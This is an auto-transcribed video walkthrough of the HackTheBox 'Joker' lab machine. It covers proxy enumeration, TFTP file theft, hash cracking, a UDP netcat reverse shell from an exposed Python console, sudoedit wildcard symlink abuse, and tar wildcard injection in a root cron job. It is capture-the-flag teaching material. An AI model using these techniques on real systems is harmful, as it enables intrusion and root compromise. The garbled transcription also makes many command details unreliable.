HackTheBox - Joker

Key Takeaways

hey guys zip and we're gonna be doing another video this time it'll be Joker this is my second-favorite box it has a really cool professed method that can be done a multitude of ways and it gets its name because well Joker's wild we use wild cards twice in the previs but before we get to the probe esque we have to get a shell so let's jump into the box so like every other box we have to start for the end map so sv4 new my version as sea safe scripts I'll put all formats and the IP address of Joker which is ten ten ten twenty one I've already unless they're not can do it again let's just look at the results we see two ports 22 SSH and 3128 for squid so no HTTP port like we're used to saying just a squid which is a HTTP proxy since I don't think there's that much of an attack surface I'm going to run a few more and maps and then do some enumeration we do - P - let's can do all ports 1 through 65535 a lot of ports it takes a long time so we'll name this all - tcp 1010 1021 will let this run just just see if it finishes by the time this video finishes I'm guessing it's not going to and we'll name this - and map all TCP open up a new one we also want to and map for UDP ports so - su for UDP it will name this UDP and 10 10 10 21 not actually going to run this one because it takes some time to run I already have the results and we'll review them in just a minute but I want to keep poking at this squid to see exactly what it is and make sure nmap is tell me the truth so we're pretending I'm running that UDP IMAP in the background while we're looking at this so we go to the IP import and we get a generic error message so we know it's an HTTP proxy so let's configure a browser to use that right click on my foxy proxy go to options and new proxy and we'll specify the IP which is 10 10 10:21 the fort 3128 go to this general tab and we'll name it Joker squid click OK close out tell the browser to use this and just go to VIP we get prompted for a username and password which we don't know we try admin admin because who knows maybe it's the default and says that password doesn't work so let's go back and review our UDP and map so that's called UDP and map and we see it is listening on port 69 in 53 55 69s TFTP so this will be where we want to stir it and if you're super observant you'll notice my end map version change from like 7.5 to 6.4 the reason for this is when I do like UDP or all port scans I try to find a box on the hack the box network that has nmap installed and run it from there because i'm that means I won't send the end map through my VPN which is slow it's just staying within the hack the Box network and and that scans go much much faster so a little bit of tip there I think I ran that one from banks since I just did banks video like two hours ago but let's begin looking at TFTP so we TFTP 10 10 10 21 and let's just try to get Etsy passwd access violation ok uh get at c-squared dot CFG found not found get at C squared dot config file not found o get at C squid doesn't return error message so if I just did at slash at sea I know that doesn't exist access violation so we're getting somewhere so we know the Etsy squid directory exists so at C squid squid dot CFG not found get Etsy squid squid dot-com and it hangs so open up a new window and let's look we have files and squid dot Kampf is one of them looks like we have download the file so we're gonna dreamt - V do a carrot to say at the beginning of the line and then escape a hash so we're gonna get rid of all lines that begin with this hash or pound sign okay now we need to grep for a dot to say hey only give me lines that have content and we get a good portion of that squid config what we do see is all per am basically a chi-squared passwords so let's try getting this file get at see squid passwords receives the file cat passwords and we do have a hash so calamari and then a PR one and just the hash so what I'm gonna do is send this over to my Kraken to crack the password you file use John or any version of hash cat just have for gpus so I always use them when I get so si ching to my box the Kraken CD hash cat CD hashes we just VI hashes slash will name this htb - squid and we don't want to give it to username we only want to give it to hash so get rid of this so before we crack this we have to figure out what type of hash it is how I normally do this is just go to Google disable bra proxies can we do hash cat example hashes go to the front first result and we have a list of hash codes the type of hash and an example I love having that example so we just do that dollar sign APR and we see the format here it's an Apache APR md5 so sixteen hundred's what we need to know you could have also done hash cat - h and grep like APR and got it that way but this doesn't give you the example hash so i like having this example hash just so I know I'm feeding hash cat the way it was tested so we do dot slash hash cat to execute it - m 1600 the hash file which is hashes and I did HTTP - squid and then the word list I have my word list and opt word list who doesn't do rock you to start see it is initializing everything and cracked the password is I hate seafood so and the username was calamari because we saw that I erased it from that so if we kept the passwords file again we see calamari : so username password is calamari I hate seafood so now that we know the credentials let's go to foxy proxy again go to options to edit or squid proxy and we can put the username which was calamari and the password is I hate seafood once this type that is again for some reason so I hate seafood and when we go to 10 10 10 21 if our proxy was enabled we don't get prompted for using them anymore we can also go to one 27001 and get a page looking at a Kelly box I can prove that I'm not listening on that because we see the I'm listening on port is on port 8080 which is my book so what's happening is kind of like a server side request forgery attack that's SS RF and this latest black cat I think black cat 2017 the US Edition had a really good talk on server side request forgery essentially what it's doing is saying hey I go to a vulnerable web page and I make that page go to a URL and when that page does it it's already behind the firewall so with squid it's kind of like the same thing except instead of a vulnerable page we're telling hey squid you're running behind the firewall go to one 27001 which is itself and it accesses the page on its local host so maybe that makes sense maybe it doesn't if it doesn't make sense look up server side request forgery and I'm sure it'll be a good video on it so the first thing I'm gonna do now is disable foxy proxy because I don't like doing things through the browser I like doing things through burp so we're gonna add a upstream proxy and that's donation host is going to be anything proxy host is gonna be ten ten ten twenty one the proxy port is gonna be thirty one twenty eight authentication type is gonna be basic calamari and I hate seafood so now if I turn my Burt proxy my foxy proxy to use burp I should get the same results and I do so if I intercept on okay so this shorty applications not vulnerable this is a false positive what I did was go back into burp go to the options tab had a proxy listener find it to port let's do eighty and redirect redirect all those two 10 10 10 21 and redirect that to port 80 so now I have book listening on port 80 and everything it does it sends it to the proxy and actually I think I need to redirect this to one 27001 so this looks really funny but burps gonna know when it redirects it to redirect it through the proxy let's see if that's valid so curl one 27001 go to boat and that didn't work see options quest fine Abel invisible proxy so I don't know why but last time said um the 10-10-10 21 when I did that get so let's try that one more time with disabling invisible and maybe that actually did it but I don't think that would do anything so looking at the request we see get one 27001 I swear the very first time I did this for some reason it said 10 10 10 21 so yeah it's not invisible proxy I don't know what went on I'll go back and watch the video but I swear burp said 10 10 10 21 let's do a history tale 5 cool yeah I've only called one point seven zero zero one so I don't know why I think burp said that but it did anyways what I'm going to do now is I just realized I didn't clean up a word list because we're going to use der search just like we do in other videos so use your share wordless doorbuster and I'm going to use the bank video because this has about a thousand lines and we're going to just put what I know is is consul that's the webpage we want to go to so we'll do /op der search if you don't have this just google der search github and you should be able to find it and install it so I'm gonna do that just a pie word list is going to be use a shared herb buster bank - bid this is really funny I would recommend if you didn't have anything just using this medium that generally has a lot of entries and the - you for URL so HTTP one 27001 we need two extensions with this so we'll just do PHP and threads we'll do 20 so that's running let's turn intercept off and we see a hit immediately on console so the reason I could do this again is because HTTP 1 27001 is going to burp which then forwards it to one 27001 but when it does the forward it's going through this proxy bit confusing but hopefully you can follow that so we know slash console and slash list exists and I don't actually know what slash list is so let's just see what that does guessing it's a list for the shorteez thing yeah so to get a slash console we get a Python interactive console let's begin running Python commands we're going to import OS so we can do the P open command which allows us to execute bash and just do who am I to see what use will running s and then end that with a dot read open and close parentheses we see a we are words ugh I guess probably a bad pronunciation the next thing I want to do is check which version of netcat is running if I can just do the - e that'd be awesome if not then I have to get a pen test monkey to figure out the syntax cuz I don't know if that part top my head didn't return anything so let's try a directing standard error to standard L because for some reason we do - help flags it goes to standard error not sure why but yeah so we see we're running the OpenBSD netcat which means we do not have the - e flag so go to pen test mountain to do a reverse shell just googling pen test monkey to reverse shell scroll down this Python one would be good however we'd run into an issue so we're just going to ignore that for now and do this net cat this says it works if you don't have the - 'flag so go back here I'm gonna add an ampersand to the end of this so it goes in the background and doesn't hang because if we ever hang a process then we have to revert the box because this web service dies so we want to send it on port 8081 and we need to get my IP address and i am 10 10 14 13 so listen here on 80 81 run this and we don't get anything that's odd this has always worked so the next thing to do is I like doing TCP dump - I ton 0 for ICMP I see mp's generally allowed through firewalls so we can just try the ping to see if thing works again leaving the ampersand there just in case the command never returns we don't hang I do - see for it to limit the amount of pings - for and when we run this we see we're getting responses so we do have a method to go from Joker to me so that's good but we don't have a way to go through TCP which is weird so next thing we're to do is find the IP tables config to see if we can read it if we can read it then we can see what's going on in what protocols and ports we have access to because maybe we can't send a shell on 8081 but we may be overdoing 80 or 443 who knows so we want to see what blocks us so I'm going to find and slash Etsy and when it grep for IP tables and we do see the rules are in IP tables rules v4 and IP tables rules v6 so I'm just gonna try to get these through TFTP first so let's just go TFTP 1010 1021 get access violation so we can't use TFT to get them and we could probably find a way to clean up our output when we're running these Python commands because it's not doing line breaks but one way I like doing things when I can only have one line is use base64 so when do base64 - w0 to change my wrapping to zero if I don't do this it tries putting the base64 multiple lines which is not good and then the file name which is IP tables rules v4 and we can also I think do a space and do rules v6 as well I think basics flow except two files we'll find out it does not unless I made a typo I don't have that see because I'm an idiot apparently so that doesn't work there we go now we've got iptables version for copy this go back to a shell okay we can do I pee tables v4 dot B 64 paste your contents base 64 - D - D code and then iptables v4 dot B 64 and we get the output so we see the input is set to drop so if we don't have a rule it drops it so we're accepting port 22 for SSH we're accepting 31 128 which will be squid we're accepting UDP and accepting ICMP so I guess we can do a UDP shell the easiest way is to do what we just did with netcat and we add the - u flag for UDP so we do NC - LV NP you 8081 [Music] and C - H UDP I thought it was - you see - e ya UDP mode I guess it just wanted that in a separate thing maybe that was bizarre so let's try this again and we get a show awesome so the next thing like always Python - see and port PT y PT y dot spawn so I spin SH to get us a better TTY and then we can background s T - I raw - echo foreground with F G and now we should be able to we can tab order complete that's odd - there we go now we can tab order complete awesome clear and clear works normally when I get the show I would start running these scripts and this directory it doesn't exist on your machine just Google each of these but these are all good proof checking scripts Lennon um win prove checker and UNIX brave ask but now make this video way too long so I'm just gonna cheat I know it's gonna be a pseudo thing so I just do sudo shell and we see that the user may run the following commands on Joker as the ala Coast user sudo edit ver dub dub dub slash wild-card / water / layout HTML joke was wild now makes sense for the machine name or at least joker does and the other thing I did on this which is kind of a hint is if we do a Deepak edge - L for sudo we see the version of sudo is 1.8 dot one six so search point so you know edit we see an exploit for one eight one four I went down this rabbit hole realize it wasn't saw this realize it was involved but turns out it is there's two ways to do this I'll show you both this is the intended way so if we look at this we see it seems that sudo edit does not check the full path if while code is used twice does this look familiar it should because this looks almost exactly like what we just saw and then down below it says if you create a symbolic link it kind of follows it so if you have two walled codes you can do a symlink and when you do that you can edit files that you're not supposed to so we can demo that but first I want to show why this is vulnerable because it says 1/8 and 1/4 we're clearly beyond that so if we Google this it's going to go to the pseudo edit check manual and we can see what these flags are this pseudo edit checked err you can read it if you want that's not really applicable here we want to check this pseudo edit follow oh my god don't tell me I went to the wrong director uh page we want the manual and we can see the pseudo edit follow was introduced in 1.8 dot 1 5 so when they fix 1/8 1/4 a like you know what I guess the earlier times when people want to use pseudo edit against symlinks so if they want to we'll create this flag for them the pseudo edit follow flag so that's why the flag exists and 1/8 1/5 is because they patched the CVE and if you wanted that functionality enable this flag so that's how we're still able to abuse this CVE so if we go to in the testing directory so when ver dub dub we're in this slash star so we want to create a new one so we're gonna make their ape SEC so now what if SEC so now we satisfied both of these wild cards so we can just do a Ln s to create a symbolic link and we do home Halla coast ssh authorized keys we should be able to edit this file so symbolic link is created we don't have the ability no no small Etsy it's not created if we have to name this layout dot HTML so now if we cat layout dot HTML no file home alle coast to make a typo I don't think I did the file doesn't exist yet that's fine so if we try to write to that file we probably can't permission denied ok that's more what I expecting so let's do the sudo edit - you Halla Coase / VAR dub dub dub / what was it testing hip sac layout dot HTML man that's annoying and we get a nano so let's do on this box SSH - key gen to create an SSH key we want to create it in / root documents htb joker ssh underscore key I guess - Oh passphrase and we created the key so now we can do SSH key pub when we copy this file in the authorized key file if we have the private key we can SH to it and since we generate it we do have the private key hit ctrl X to save save modify buffer yes and if we can't authorize Keys we now see we modified it because we were the electives user by sudo at it so if we go to Joker box SSH - I SH underscore key al occurs at 1010 1021 we get in we have ssh but you wanted to see probably the other way to do this the other way isn't through a CVE and it wasn't intended and it's my favorite way this is how i did it the first time so soon let's see i probably want to have more lines yeah so i don't like how this is doing that weird rap so let's see echo columns 80 go here go columns 188 so if i do export columns equals 188 no oh I thought that would do that export term equals screen okay I'm not sure so how I'm gonna do this is we'll just do this in a different window and then copy and paste that should be fun so let's split my window sudo - I'll go down so here I'm going to go into slash home how it goes since I can go in his home directory so the key thing to here for this exploit is we're taking advantage by setting or current working directory and this will make more sense in just a second so we do sudo edit - you Halla coos and then we're going to do slash verse / dub dub dub slash so this piece is now satisfied with the wild-card we can do whatever we want so I can do a space then I can do dot SSH and we satisfied this wall turn now so if I do a slash authorized keys we satisfy that slash in this wall could if I do another space layout slash layout dot HTML I now have satisfied this whole thing and nano gets three parameters it edits three different files so if we copy this go up here paste we get in as well well we act control X to close it wants us to edit another file just exit again and we see it did sudo edit against two files so that was that way to do the box so the what's left is getting route the trick to getting route is the backup folder so we look into backup and get a permission nut because I'm going through netcat not SSH so remember when I did the authorize key file the very first time could and logged in this is that session so if I do it Who am I here I see I am a locus if this actually returns there we go and going to my net cat Who am I works ugh so go to my SSH and we should be able to go into backups and do LS la we can see that a backup is being created every five minutes on the dot and they are owned by root that is odd so let's look at what's in a backup so we do tour X CBF probably quicker just a copy and paste not in gzip Oh what is the flag for chisa J's bz2 let's just concept st man John a blank okay these are tough not gzip the GZ is a lie that's weird so tur x VF dot that slash dev so we can see it is just backing up what is in the development folder every five minutes it looks like someone else has been on this machine can I delete these files yes I can so this is what it should look like look at the date so it just did a backup so we have about five minutes until the next one runs so since it's doing a backup every five minutes the very first thing we'll do is the first way so we can archive off this development folder and then I need - yes I think root development so what I did there is created a symbolic link to development and when it follows hold on explaining is hurt sometimes so when the term and goes to archive or backup development the symbolic link is directing it to slash root so in five minutes we should be able to go to backup and see the contents of the root directory you could also do that with like Etsy and get the shadow file and then crack the password there's another way to get command execution but it'll probably take more than five minutes to explain so while explaining that's running in the background when you do a wild card and this machine's going really slow but it's not just passing the wild card to the binary what the world code is doing is essentially a LS of the directory and it's passing all of these arguments to this binary so if one of these arguments these files was an argument it will pass that to the binary if that makes sense so we do LS star and it just does LS like that so if we did touch - way and do LS stir now it pipes that - la - LS and we changed the command does that make sense hopefully it does so again el estor but when we do the stir it's executing la you can also see there's no - la here because it wasn't treated as a file it was treated as an argument so that's the dangers of wildcard and what you should take away from this box and notice when I removed the - la I put a dot slash in front of it so it didn't treat that as an argument so if we go to I think it's defense code yeah - a wild-card this blog post talks about it so you can just google defense defense code wild code and find it but it talks about CH own tore this - - checkpoint and what it's doing is actually allowing you to execute a script from thar argument so si has it been five minutes yet note we got two minutes so we're going to touch - - - what was it checkpoint equals one I know - - yeah my connection is going so slow so what this - - is doing is actually just saying hey there's gonna be no arguments after this so if I just did like touch - - checkpoint equals one it's probably to say I have no idea what you're trying to do yeah unrecognized option it doesn't know what that argument is so this - - says hey this isn't gonna be an argument this is gonna be a file create it and we see that - - checkpoint has been created the next file we want to create is got a space in it so I'm going to do a single quote I'm gonna do checkpoint - action equals exec equals Sh they do dot slash no they just did shell so shell Sh so we do LS here and we see we have both of these created the next thing we have to do is actually create the show at SH file I don't have V so been - and we can go back to this copy over shall we used earlier and whenever you see me doing the paste and it's not working and then I do paste again without copying it's because I'm hitting ctrl shift insert and you have multiple clip words on your computer so ctrl shift insert and shift insert a different clip boards if that makes sense and you'll get different results ah I can't do DD delete a line okay so let's see we can make these separate lines that looks fine so we're gonna write shell dot SH the other thing I'm gonna do is one set against this and we're going to change temp / f to temp / I so we can see that's changed it looks fine and then - I the reason I'm doing that is because temp /f already existed and I'm using it for this shell so I just didn't want to step on myself and if we oh no oh no he mucks I don't know how to resume T MUX and I minimize T MUX there we go awesome so we are back in whoo that that was scary so where was I let's go back up that's definitely good five minutes now so do LS we can move this dev this one the latest one to extract and then tor xvf dev and we get route text so that's one way to do it but we wanted to get an actual show so let's see what time it is we have one and a half minutes so go back one more directory V oh we can just delete that and then we can move our development back to development so we have when it does that tourists are it's going to run this checkpoint and then this checkpoint action and this showdown Sh so let's look at this 10 10 14 13 I have config I'm still that IP so LVN P 80 82 - you do I have that as a DAT - I do not so let's change this don't have V it is a DAT - can I not read Kat SSH who ever shown at Sh - oh that's bloody confusing so and it's using shoulder SH so let's just CP test out SH - Sheldon Sh okay and I missed the window oh my god that sucks so we gotta wait five minutes I want to stop the video and then place it back up so you're not sitting here waiting and watching me wait five minutes so it's been a few minutes and while this is going let's just examine what that backup dot sh was doing or the backup script so we see it doing a CD home alecko's development then it's doing a tour there's the wild card and then CH owning the back up and then exiting so I bet oh no nevermind I was think if we deleted this for the development folder then the term may just back up the way it is but no no no it will yeah we'll do that next we're gonna delete this development folder and then see exactly what gets backed up it should be the current working directory of roots so there's gonna be three different ways you can get root or get the root text look at the date though we got about one minute left until the netcat session so hopefully this one will work development so we're gonna do checkpoint one it's going to do that we'll just chmod plus x on shell dot Sh let's do a neck cat on - you that's fine my neck cat is - you and 8080 - everything's fine so in 30 seconds I should get a shell so let's see when that sleep is finished I will have a shell come on I should have done a for loop and did like a fancy countdown maybe the time always goes slower when you are watching it and I did not get a shell so I screwed something up Oh nope there we go got it so I am route awesome so there's another way and then the final way we're going to do this is simply just moving this development folder and not doing a symlink so move development to development got back and we're gonna wait five minutes so again gonna stop the video and good a new one so I can splice this third probe ask in because I don't want to just sit around and have you wait for my commands to finish because this takes forever four minutes yeah so so we're almost there we got about 30 seconds left until the cron runs and we see if anything happened so let's go back into the backup folder do LS dash away and we see the last ones failed because we're doing the reverse shell I'm guessing so we should get one more file and we'll see what happens if you delete the development folder a backup and it's just about the same size as when we did the symlinks so I would guess that we got the flag it's not what I wanted one effect to xvf and yes we got it so again what happened was this script runs every 5 minutes and it did a CD home holocaust development this CD failed because development did not exist so CD failed and it never changed directories and that runs at our command tour CF home al cares backup file name this is the backup name and that just as star says hey backup everything in my directory so that was the third way to get the root flag I hope that makes sense hope you guys enjoyed this video I know this was a bit all over the place and I just realized I didn't hide that bar up the top when I resumed oh well take care I'll see you guys in probably a week when the next box retires actually one last thing I remembered just as those better shut down my PC we have an nmap going that I want to look at so let's see if that all finished it has not it has been going I took a break and middle this video but seven hours no seven hours 51 minutes remaining I started this three hours ago so that is how long this - P - takes I'd even specify the - I see flags or anything so that is long that is a long time forehead map and that's why I gently sneak onto another box to run it so yep I hope you guys enjoyed peace